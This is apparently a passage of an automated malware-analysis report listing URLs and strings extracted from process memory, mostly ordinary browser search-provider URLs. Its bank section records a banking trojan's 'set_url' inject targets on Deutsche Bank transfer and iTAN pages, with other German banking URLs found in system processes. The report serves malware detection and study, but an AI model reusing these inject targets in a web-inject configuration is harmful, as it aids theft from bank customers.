http://search.espn.go.com/	iexplore.exe
http://search.gamer.com.tw/	iexplore.exe
http://search.gamer.com.tw/favicon.ico	iexplore.exe
http://search.gismeteo.ru/	iexplore.exe
http://search.goo.ne.jp/	iexplore.exe
http://search.goo.ne.jp/favicon.ico	iexplore.exe
http://search.hanafos.com/	iexplore.exe
http://search.hanafos.com/favicon.ico	iexplore.exe
http://search.interpark.com/	iexplore.exe
http://search.ipop.co.kr/	iexplore.exe
http://search.ipop.co.kr/favicon.ico	iexplore.exe
http://search.live.com/results.aspx?form=iefm1&q=	iexplore.exe
http://search.live.com/results.aspx?form=so2tdf&q=	iexplore.exe
http://search.live.com/results.aspx?form=soltdf&q=	iexplore.exe
http://search.live.com/results.aspx?q=	iexplore.exe
http://search.live.com/results.aspx?q=search&form=hpdtdf	iexplore.exe
http://search.live.com/results.aspx?q=search&form=hpntdf	iexplore.exe
http://search.livedoor.com/	iexplore.exe
http://search.livedoor.com/favicon.ico	iexplore.exe
http://search.lycos.co.uk/	iexplore.exe
http://search.lycos.com/	iexplore.exe
http://search.lycos.com/favicon.ico	iexplore.exe
http://search.microsoft.com/	iexplore.exe
http://search.msn.co.jp/results.aspx?q=	iexplore.exe
http://search.msn.co.uk/results.aspx?q=	iexplore.exe
http://search.msn.com.cn/results.aspx?q=	iexplore.exe
http://search.msn.com/results.aspx?q=	iexplore.exe
http://search.nate.com/	iexplore.exe
http://search.naver.com/	iexplore.exe
http://search.naver.com/favicon.ico	iexplore.exe
http://search.nifty.com/	iexplore.exe
http://search.orange.co.uk/	iexplore.exe
http://search.orange.co.uk/favicon.ico	iexplore.exe
http://search.rediff.com/	iexplore.exe
http://search.rediff.com/favicon.ico	iexplore.exe
http://search.seznam.cz/	iexplore.exe
http://search.seznam.cz/favicon.ico	iexplore.exe
http://search.sify.com/	iexplore.exe
http://search.yahoo.co.jp	iexplore.exe
http://search.yahoo.co.jp/favicon.ico	iexplore.exe
http://search.yahoo.com/	iexplore.exe
http://search.yahoo.com/favicon.ico	iexplore.exe
http://search.yam.com/	iexplore.exe
http://search1.taobao.com/	iexplore.exe
http://search2.estadao.com.br/	iexplore.exe
http://searchresults.news.com.au/	iexplore.exe
http://service2.bfast.com/	iexplore.exe
http://si.wikipedia.org/	iexplore.exe
http://si.wikipedia.org/favicon.ico	iexplore.exe
http://si.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://sitesearch.timesonline.co.uk/	iexplore.exe
http://so-net.search.goo.ne.jp/	iexplore.exe
http://spaces.live.com/	iexplore.exe
http://spaces.live.com/blogit.aspx	iexplore.exe
http://ssl.gstatic.com/	iexplore.exe
http://ssl.gstatic.com/gb/images/j_e6a6aca6.png	iexplore.exe
http://ssl.gstatic.com/gb/images/j_e6a6aca6.png...	iexplore.exe
http://ssl.gstatic.com/gb/images/j_e6a6aca6.png...g	iexplore.exe
http://ssl.gstatic.com/gb/js/sem_feed2a2e2d54cd5f40fb4b5f5244fff2.js	iexplore.exe
http://suche.aol.de/	iexplore.exe
http://suche.freenet.de/	iexplore.exe
http://suche.freenet.de/favicon.ico	iexplore.exe
http://suche.lycos.de/	iexplore.exe
http://suche.t-online.de/	iexplore.exe
http://suche.web.de/	iexplore.exe
http://suche.web.de/favicon.ico	iexplore.exe
http://support.microsoft.com	iexplore.exe
http://translate.google.fr/?hl=fr&tab=wt	iexplore.exe, google_fr[1].txt.dr
http://translator.live.com/?ref=ie8activity	iexplore.exe
http://translator.live.com/bv.aspx?ref=ie8activity&a=	iexplore.exe
http://translator.live.com/bvprev.aspx?ref=ie8activity	iexplore.exe
http://translator.live.com/default.aspx?ref=ie8activity	iexplore.exe
http://translator.live.com/defaultprev.aspx?ref=ie8activity	iexplore.exe
http://treyresearch.net	iexplore.exe
http://tw.search.yahoo.com/	iexplore.exe
http://udn.com/	iexplore.exe
http://udn.com/favicon.ico	iexplore.exe
http://uk.ask.com/	iexplore.exe
http://uk.ask.com/favicon.ico	iexplore.exe
http://uk.search.yahoo.com/	iexplore.exe
http://vachercher.lycos.fr/	iexplore.exe
http://video.globo.com/	iexplore.exe
http://video.globo.com/favicon.ico	iexplore.exe
http://video.google.fr/?hl=fr&tab=wv	iexplore.exe, google_fr[1].txt.dr
http://web.ask.com/	iexplore.exe
http://wellformedweb.org/commentapi/	iexplore.exe
http://windowsupdate.microsoft.com	iexplore.exe
http://www.abril.com.br/	iexplore.exe
http://www.abril.com.br/favicon.ico	iexplore.exe
http://www.afisha.ru/app_themes/default/images/favicon.ico	iexplore.exe
http://www.alarabiya.net/	iexplore.exe
http://www.alarabiya.net/favicon.ico	iexplore.exe
http://www.amazon.co.jp/	iexplore.exe
http://www.amazon.co.uk/	iexplore.exe
http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=	iexplore.exe
http://www.amazon.com/favicon.ico	iexplore.exe
http://www.amazon.com/gp/search?ie=utf8&tag=ie8search-20&index=blended&linkcode=qs&camp=1789&creative=9325&keywords=	iexplore.exe
http://www.amazon.de/	iexplore.exe
http://www.aol.com/favicon.ico	iexplore.exe
http://www.arrakis.com/	iexplore.exe
http://www.arrakis.com/favicon.ico	iexplore.exe
http://www.asharqalawsat.com/	iexplore.exe
http://www.asharqalawsat.com/favicon.ico	iexplore.exe
http://www.ask.com/	iexplore.exe
http://www.auction.co.kr/auction.ico	iexplore.exe
http://www.autoitscript.com/autoit3/	explorer.exe
http://www.baidu.com/	iexplore.exe
http://www.baidu.com/favicon.ico	iexplore.exe
http://www.bing.com/favicon.ico	iexplore.exe
http://www.bing.com/search	iexplore.exe
http://www.bing.com/search?q=	iexplore.exe
http://www.bing.com/search?q=%7bsearchterms%7d&src=ie-s	iexplore.exe
http://www.blogger.com/?tab=wj	iexplore.exe, google_fr[1].txt.dr
http://www.cdiscount.com/	iexplore.exe
http://www.cdiscount.com/favicon.ico	iexplore.exe
http://www.ceneo.pl/	iexplore.exe
http://www.ceneo.pl/favicon.ico	iexplore.exe
http://www.certplus.com/crl/class1.crl0	iexplore.exe
http://www.certplus.com/crl/class2.crl0	iexplore.exe
http://www.certplus.com/crl/class3.crl0	iexplore.exe
http://www.certplus.com/crl/class3p.crl0	iexplore.exe
http://www.certplus.com/crl/class3ts.crl0	iexplore.exe
http://www.chennaionline.com/ncommon/images/collogo.ico	iexplore.exe
http://www.cjmall.com/	iexplore.exe
http://www.cjmall.com/favicon.ico	iexplore.exe
http://www.clarin.com/favicon.ico	iexplore.exe
http://www.cnet.co.uk/	iexplore.exe
http://www.cnet.com/favicon.ico	iexplore.exe
http://www.dailymail.co.uk/	iexplore.exe
http://www.dailymail.co.uk/favicon.ico	iexplore.exe
http://www.digsigtrust.com/dst_trust_cps_v990701.html0	iexplore.exe
http://www.entrust.net/crl/net1.crl0	iexplore.exe
http://www.etmall.com.tw/	iexplore.exe
http://www.etmall.com.tw/favicon.ico	iexplore.exe
http://www.excite.co.jp/	iexplore.exe
http://www.expedia.com/	iexplore.exe
http://www.expedia.com/favicon.ico	iexplore.exe
http://www.facebook.com/	iexplore.exe
http://www.facebook.com/favicon.ico	iexplore.exe
http://www.gismeteo.ru/favicon.ico	iexplore.exe
http://www.gmarket.co.kr/	iexplore.exe
http://www.gmarket.co.kr/favicon.ico	iexplore.exe
http://www.google.co.in/	iexplore.exe
http://www.google.co.jp/	iexplore.exe
http://www.google.co.uk/	iexplore.exe
http://www.google.com	iexplore.exe
http://www.google.com.br/	iexplore.exe
http://www.google.com.sa/	iexplore.exe
http://www.google.com.tw/	iexplore.exe
http://www.google.com/	iexplore.exe
http://www.google.com/favicon.ico	iexplore.exe
http://www.google.com/ncr	iexplore.exe, google_fr[1].txt.dr
http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657	iexplore.exe
http://www.google.com/support/websearch/bin/answer.py?hl=	iexplore.exe, rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA[1].dr
http://www.google.com/textinputassistant/tia.png	iexplore.exe
http://www.google.cz/	iexplore.exe
http://www.google.de/	iexplore.exe
http://www.google.es/	iexplore.exe
http://www.google.fr	iexplore.exe
http://www.google.fr/	~DF47A8.tmp.dr
http://www.google.fr/%20-%20windows%20internet%20explorer	iexplore.exe
http://www.google.fr/&sig=0_hcscewpus89t60fc3cg2evi57am%3d&suggon=2	iexplore.exe, google_fr[1].txt.dr
http://www.google.fr/&sig=0_hcscewpus89t60fc	iexplore.exe
http://www.google.fr/&sig=0_hcscewpus89t60fc3cg2evi57am%3d&suggon=2	iexplore.exe
http://www.google.fr/advanced_search?hl=fr	iexplore.exe
http://www.google.fr/chrome/index.html?hl=fr&brand=chng&utm_source=fr-hpp&utm_medium=hpp&utm_campaign=fr	iexplore.exe
http://www.google.fr/csi?v=3&s=webhp&action=&e=25657	iexplore.exe
http://www.google.fr/ex	iexplore.exe
http://www.google.fr/extern_chrome/b0659096785d29d3.js	iexplore.exe
http://www.google.fr/favicon.ico	iexplore.exe
http://www.google.fr/history/optout?hl=fr	iexplore.exe
http://www.google.fr/ig	iexplore.exe
http://www.google.fr/ig%3fhl%3dfr%26source%3diglk&usg=afqjcng3dq3pmqcxa1eqhlnwiuh8e97qkg	iexplore.exe, google_fr[1].txt.dr
http://www.google.fr/ig%3fhl%3dfr%26source%3diglk&usg=afqjcng3dq3pmqcxa1eqhlnwiuh8e97qkg	iexplore.exe
http://www.google.fr/ig/	iexplore.exe
http://www.google.fr/images/icons/product/chrome-48.png	iexplore.exe
http://www.google.fr/images/mgyhp_sm.png	iexplore.exe
http://www.google.fr/images/nav_logo107.png	iexplore.exe
http://www.google.fr/images/srpr/logo3w.png	iexplore.exe
http://www.google.fr/images/swxa.gif	iexplore.exe
http://www.google.fr/imghp?hl=fr&tab=wi	iexplore.exe, google_fr[1].txt.dr
http://www.google.fr/intl/fr/about.html	iexplore.exe
http://www.google.fr/intl/fr/ads/	iexplore.exe
http://www.google.fr/intl/fr/options	iexplore.exe
http://www.google.fr/intl/fr/options/	google_fr[1].txt.dr
http://www.google.fr/intl/fr/policies	iexplore.exe
http://www.google.fr/intl/fr/policies/	iexplore.exe
http://www.google.fr/language_tools?hl=fr	iexplore.exe
http://www.google.fr/mgyhp.html	iexplore.exe
http://www.google.fr/preferences?hl=fr	iexplore.exe
http://www.google.fr/reader/?hl=fr&tab=wy	iexplore.exe, google_fr[1].txt.dr
http://www.google.fr/search	iexplore.exe
http://www.google.fr/services/	iexplore.exe
http://www.google.fr/setprefs?prev=http://www.google.fr/&sig=0_hcscewpus89t60fc3cg2evi57am%3d&suggon=2	iexplore.exe
http://www.google.fr/shop	iexplore.exe
http://www.google.fr/shopping?hl=fr&tab=wf	iexplore.exe, google_fr[1].txt.dr
http://www.google.fr/support/websearch/bin/answer.py?answer=186645&form=bb&hl=fr	iexplore.exe
http://www.google.fr/typelib	iexplore.exe
http://www.google.fr/url?sa=p&pref=ig&pval=3&q=http://www.googl	iexplore.exe
http://www.google.fr/url?sa=p&pref=ig&pval=3&q=http://www.google.fr/ig%3fhl%3dfr%26source%3diglk&usg=afqjcng3dq3pmqcxa1eqhlnwiuh8e97qkg	iexplore.exe
http://www.google.fr/webhp	iexplore.exe
http://www.google.fr/webhp/	iexplore.exe
http://www.google.fr/webhp?hl=fr&tab=ww	iexplore.exe, google_fr[1].txt.dr
http://www.google.fr/xjs/_/js/s/s	iexplore.exe
http://www.google.it/	iexplore.exe
http://www.google.pl/	iexplore.exe
http://www.google.ru/	iexplore.exe
http://www.google.si/	iexplore.exe
http://www.iask.com/	iexplore.exe
http://www.iask.com/favicon.ico	iexplore.exe
http://www.kkbox.com.tw/	iexplore.exe
http://www.kkbox.com.tw/favicon.ico	iexplore.exe
http://www.linternaute.com/favicon.ico	iexplore.exe
http://www.live.com/favicon.ico	iexplore.exe
http://www.maktoob.com/favicon.ico	iexplore.exe
http://www.mercadolibre.com.mx/	iexplore.exe
http://www.mercadolibre.com.mx/favicon.ico	iexplore.exe
http://www.mercadolivre.com.br/	iexplore.exe
http://www.mercadolivre.com.br/favicon.ico	iexplore.exe
http://www.merlin.com.pl/	iexplore.exe
http://www.merlin.com.pl/favicon.ico	iexplore.exe
http://www.microsoft.com	explorer.exe
http://www.microsoft.com/favicon.ico	iexplore.exe
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome	iexplore.exe
http://www.microsoft.com/schemas/rss/core/2005	iexplore.exe
http://www.microsoft.com/schemas/rss/core/2005/internal	iexplore.exe
http://www.microsoft.com/windowsxp/expertzone/	iexplore.exe
http://www.mtv.com/	iexplore.exe
http://www.mtv.com/favicon.ico	iexplore.exe
http://www.myspace.com/favicon.ico	iexplore.exe
http://www.najdi.si/	iexplore.exe
http://www.najdi.si/favicon.ico	iexplore.exe
http://www.nate.com/favicon.ico	iexplore.exe
http://www.neckermann.de/	iexplore.exe
http://www.neckermann.de/favicon.ico	iexplore.exe
http://www.news.com.au/favicon.ico	iexplore.exe
http://www.nifty.com/favicon.ico	iexplore.exe
http://www.ocn.ne.jp/favicon.ico	iexplore.exe
http://www.orange.fr/	iexplore.exe
http://www.otto.de/favicon.ico	iexplore.exe
http://www.ozon.ru/	iexplore.exe
http://www.ozon.ru/favicon.ico	iexplore.exe
http://www.ozu.es/favicon.ico	iexplore.exe
http://www.paginasamarillas.es/	iexplore.exe
http://www.paginasamarillas.es/favicon.ico	iexplore.exe
http://www.pchome.com.tw/favicon.ico	iexplore.exe
http://www.priceminister.com/	iexplore.exe
http://www.priceminister.com/favicon.ico	iexplore.exe
http://www.quovadisglobal.com/cps0	iexplore.exe
http://www.rakuten.co.jp/favicon.ico	iexplore.exe
http://www.rambler.ru/	iexplore.exe
http://www.rambler.ru/favicon.ico	iexplore.exe
http://www.recherche.aol.fr/	iexplore.exe
http://www.rtl.de/	iexplore.exe
http://www.rtl.de/favicon.ico	iexplore.exe
http://www.servicios.clarin.com/	iexplore.exe
http://www.shopzilla.com/	iexplore.exe
http://www.sify.com/favicon.ico	iexplore.exe
http://www.skype.com/	iexplore.exe
http://www.skype.com/go/download	iexplore.exe
http://www.skype.com/go/help.guides.ieaddon?lang=en	iexplore.exe
http://www.so-net.ne.jp/share/favicon.ico	iexplore.exe
http://www.sogou.com/	iexplore.exe
http://www.sogou.com/favicon.ico	iexplore.exe
http://www.soso.com/	iexplore.exe
http://www.soso.com/favicon.ico	iexplore.exe
http://www.t-online.de/favicon.ico	iexplore.exe
http://www.taobao.com/	iexplore.exe
http://www.taobao.com/favicon.ico	iexplore.exe
http://www.target.com/	iexplore.exe
http://www.target.com/favicon.ico	iexplore.exe
http://www.tchibo.de/	iexplore.exe
http://www.tchibo.de/favicon.ico	iexplore.exe
http://www.tesco.com/	iexplore.exe
http://www.tesco.com/favicon.ico	iexplore.exe
http://www.timesonline.co.uk/img/favicon.ico	iexplore.exe
http://www.tiscali.it/favicon.ico	iexplore.exe
http://www.trustcenter.de/guidelines0	iexplore.exe
http://www.univision.com/	iexplore.exe
http://www.univision.com/favicon.ico	iexplore.exe
http://www.valicert.com/1	iexplore.exe
http://www.w3.org/1999/02/22-rdf-syntax-ns#	iexplore.exe
http://www.w3.org/1999/xhtml	iexplore.exe
http://www.w3.org/1999/xsl/transform	iexplore.exe
http://www.w3.org/2005/atom	iexplore.exe
http://www.w3.org/tr/html4/loose.dtd	iexplore.exe
http://www.w3.org/tr/html4/strict.dtd	iexplore.exe
http://www.w3.org/tr/html401/strict.dtd	iexplore.exe
http://www.w3.org/tr/rec-html40/strict.dtd	iexplore.exe
http://www.w3.org/tr/wd-xsl	iexplore.exe
http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd	iexplore.exe
http://www.walmart.com/	iexplore.exe
http://www.walmart.com/favicon.ico	iexplore.exe
http://www.weather.com/	iexplore.exe
http://www.weather.com/favicon.ico	iexplore.exe
http://www.ya.com/favicon.ico	iexplore.exe
http://www.yam.com/favicon.ico	iexplore.exe
http://www.yandex.ru/	iexplore.exe
http://www.yandex.ru/favicon.ico	iexplore.exe
http://www.youtube.com/?tab=w1&gl=fr	iexplore.exe, google_fr[1].txt.dr
http://www3.fnac.com/	iexplore.exe
http://www3.fnac.com/favicon.ico	iexplore.exe
http://xml-us.amznxslt.com/onca/xml?service=awsecommerceservice&version=2008-06-26&operation=itemsearch&awsaccesskeyid=15hrv3azsmpk0gxty102&associatetag=ie8suggestion-20&responsegroup=itemattributes	iexplore.exe
http://yellowpages.superpages.com/	iexplore.exe
http://z.about.com/m/a08.ico	iexplore.exe
https://accounts.google.com/login?hl=	iexplore.exe, rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA[1].dr
https://accounts.google.com/servicelogin?hl=fr&continue=http://www.google.fr/	iexplore.exe, google_fr[1].txt.dr
https://apis.google.com	iexplore.exe, google_fr[1].txt.dr
https://banking.postbank.de/app/finanzs	svchost.exe
https://banking.postbank.de/app/finanzstatus.init.do	iexplore.exe
https://banking.postbank.de/app/kontoumsatz.umsatz.init.do	iexplore.exe
https://banking.postbank.de/app/legitimation.input.do	iexplore.exe
https://banking.postbank.de/app/static/js/script.js	iexplore.exe
https://banking.postbank.de/app/tan.historie.input.do	iexplore.exe
https://banking.postbank.de/app/ueberwe	spoolsv.exe, svchost.exe
https://banking.postbank.de/app/ueberweisung.init.do	iexplore.exe
https://banking.postbank.de/app/ueberweisung.input.do	iexplore.exe
https://banking.postbank.de/app/ueberweisung.prep.do	iexplore.exe
https://banking.postbank.de/app/ueberweisung.quittung.do	iexplore.exe
https://banking.postbank.de/app/ueberweisung.termin.liste.input.do	iexplore.exe
https://banking.postbank.de/app/vorscha	svchost.exe
https://banking.postbank.de/app/vorschaltseite.init.do	iexplore.exe
https://banking.postbank.de/app/welcome.do	iexplore.exe
https://bankingportal.ksk-tuebingen.de/ifdata/64150020/ipstandard/4/content	msiexec.exe
https://bankingportal.ksk-tuebingen.de/ifdata/64150020/ipstandard/4/content/www/pixel/basis/if5_anmelden.png	iexplore.exe
https://ca.sia.it/seccli/repository/cps0	iexplore.exe
https://ca.sia.it/secsrv/repository/cps0	iexplore.exe
https://docs.google.com/?tab=wo	iexplore.exe, google_fr[1].txt.dr
https://example.com	iexplore.exe
https://finanzportal.fiducia.de	iexplore.exe
https://ieonline.microsoft.com/#ieslice	iexplore.exe
https://ieonline.microsoft.com/favicon.ico	iexplore.exe
https://ieonlinews.microsoft.com/	iexplore.exe
https://mail.google.com/mail/?tab=wm	iexplore.exe, google_fr[1].txt.dr
https://my.hypovereinsbank.de/prot/banking/securetan/ca	winlogon.exe
https://my.hypovereinsbank.de/prot/banking/securetan/captcha?captchaname=securetan	globpluginspipe.dr
https://play.google.com/?hl=fr&tab=w8	iexplore.exe, google_fr[1].txt.dr
https://plus.google.com/106901486880272202822	iexplore.exe, google_fr[1].txt.dr
https://plus.google.com/?gpsrc=ogpy0&tab=wx	iexplore.exe, google_fr[1].txt.dr
https://plusone.google.com/u/0	iexplore.exe, google_fr[1].txt.dr
https://secure.comodo.com/cps0	iexplore.exe
https://secure5.arcot.com/acspage/de_de_lufthansa_mc/images/bcsluf.gif	iexplore.exe
https://secure5.arcot.com/acspage/hsbcfdirect_en_gb/images/vpas_logo.gif	iexplore.exe
https://symlink.us/cgi-bin/acd/acd.js	iexplore.exe
https://www.commerzbanking.de/p-	wmiprvse.exe
https://www.commerzbanking.de/p-portal1/xml/ifilportal/cms/images/but_anmelden.gif	iexplore.exe
https://www.commerzbanking.de/p-portal2/xml/if	MDM.EXE
https://www.commerzbanking.de/p-portal2/xml/ifilportal	svchost.exe
https://www.commerzbanking.de/p-portal2/xml/ifilportal/pgf.html?tab=1	iexplore.exe
https://www.google.com/calendar?tab=wc	iexplore.exe, google_fr[1].txt.dr
https://www.netlock.net/docs	iexplore.exe
https://www.verisign.com/cps0	iexplore.exe
https://www.verisign.com/repository/cps	iexplore.exe
https://www.verisign.com/repository/verisignlogo.gif0d	iexplore.exe
https://www.verisign.com/rpa	iexplore.exe, 0797C381B2F87EB5A1D5573BD15BA4F40.dr
https://www.verisign.com/rpa0	iexplore.exe
https://www.verisign.com;	iexplore.exe

Social media names
String value	Source
<SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo)	iexplore.exe
<FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)	iexplore.exe
<FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)	iexplore.exe
<FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)	iexplore.exe
<FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)	iexplore.exe
<FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)	iexplore.exe
<URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace)	iexplore.exe
<URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)	iexplore.exe
<URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)	iexplore.exe
<URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)	iexplore.exe
"http://www.youtube.com/?tab=w1&gl=FR equals www.youtube.com (Youtube)	iexplore.exe
.yahoo. equals www.yahoo.com (Yahoo)	iexplore.exe
Free Hotmail.url equals www.hotmail.com (Hotmail)	iexplore.exe
YouTube equals www.youtube.com (Youtube)	iexplore.exe
google.promos.mgmhp.initPulldown(rlz,logParams);});})();</script> </div><div id="mngb"><div id=gb><script>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbzw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a onclick=gbar.logger.il(1,{t:119}); class=gbzt id=gb_119 href="https://plus.google.com/?gpsrc=ogpy0&tab=wX"><span class=gbtb2></span><span class=gbts>+Vous</span></a></li><li class=gbt><a onclick=gbar.logger.il(1,{t:1}); class="gbzt gbz0l gbp1" id=gb_1 href="http://www.google.fr/webhp?hl=fr&tab=ww"><span class=gbtb2></span><span class=gbts>Recherche</span></a></li><li class=gbt><a onclick=gbar.qs(this);gbar.logger.il(1,{t:2}); class=gbzt id=gb_2 href="http://www.google.fr/imghp?hl=fr&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a onclick=gbar.qs(this);gbar.logger.il(1,{t:8}); class=gbzt id=gb_8 href="http://maps.google.fr/maps?hl=fr&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a onclick=gbar.logger.il(1,{t:78}); class=gbzt id=gb_78 href="https://play.google.com/?hl=fr&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a onclick=gbar.qs(this);gbar.logger.il(1,{t:36}); class=gbzt id=gb_36 href="http://www.youtube.com/?tab=w1&gl=FR"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a onclick=gbar.logger.il(1,{t:5}); class=gbzt id=gb_5 href="http://news.google.fr/nwshp?hl=fr&tab=wn"><span class=gbtb2></span><span class=gbts>Actualit equals www.youtube.com (Youtube)	google_fr[1].txt.dr
http://www.youtube.com/?tab=w1&gl=FR equals www.youtube.com (Youtube)	iexplore.exe
ing.myspace.co equals www.myspace.com (Myspace)	iexplore.exe
login.yahoo.com equals www.yahoo.com (Yahoo)	iexplore.exe
login.yahoo.com0 equals www.yahoo.com (Yahoo)	iexplore.exe
messaging.myspace.com equals www.myspace.com (Myspace)	iexplore.exe
profile.myspace.com/Modules/Applications/ equals www.myspace.com (Myspace)	iexplore.exe
trator@http://www.youtube.com/?tab=w1&gl=FR equals www.youtube.com (Youtube)	iexplore.exe
ts>Play</span></a></li><li class=gbt><a onclick=gbar.qs(this);gbar.logger.il(1,{t:36}); class=gbzt id=gb_36 href="http://www.youtube.com/?tab=w1&gl=FR"><span class=gbtb2></ equals www.youtube.com (Youtube)	iexplore.exe
www.login.yahoo.com0 equals www.yahoo.com (Yahoo)	iexplore.exe
www.youtube.com equals www.youtube.com (Youtube)	iexplore.exe
youtube equals www.youtube.com (Youtube)	iexplore.exe
youtube.com equals www.youtube.com (Youtube)	iexplore.exe

Bank names
String value	Source
meine.deutsche-bank.de/trxm/db/domestic.transfer.auth.error* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/domestic.transfer.confirmation* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/domestic.transfer.form.display* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/european.transfer.auth.error* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/european.transfer.confirmation* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/european.transfer.enter.data* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/fold.financial.overview* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/itan.authorization* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/select.type.of.overseas.remittance* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
meine.deutsche-bank.de/trxm/db/show.account.turnovers* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
deutsche-bank.de/trxm/db/european.transfer.enter.data GP equals www.deutsche-bank.de (Deutsche Bank AG)	wscntfy.exe
deutsche-bank.de/trxm/db/european.transfer.enter.data equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/domestX equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/domestic.transfer.auth.error* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/domestic.transfer.auth.error* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe
set_url meine.deutsche-bank.de/trxm/db/domestic.transfer.confirmation* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/domestic.transfer.confirmation* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe, iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/domestic.transfer.form.display* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/domestic.transfer.form.display* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe, iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/european.transfer.auth.error* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/european.transfer.auth.error* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe, iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/european.transfer.confirmation* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/european.transfer.confirmation* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe
set_url meine.deutsche-bank.de/trxm/db/european.transfer.enter.data* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/european.transfer.enter.data* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe
set_url meine.deutsche-bank.de/trxm/db/fold.financial.overview* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/fold.financial.overview* equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/itan.authorization* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/itan.authorization* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe, iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/select.type.of.overseas.remittance* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
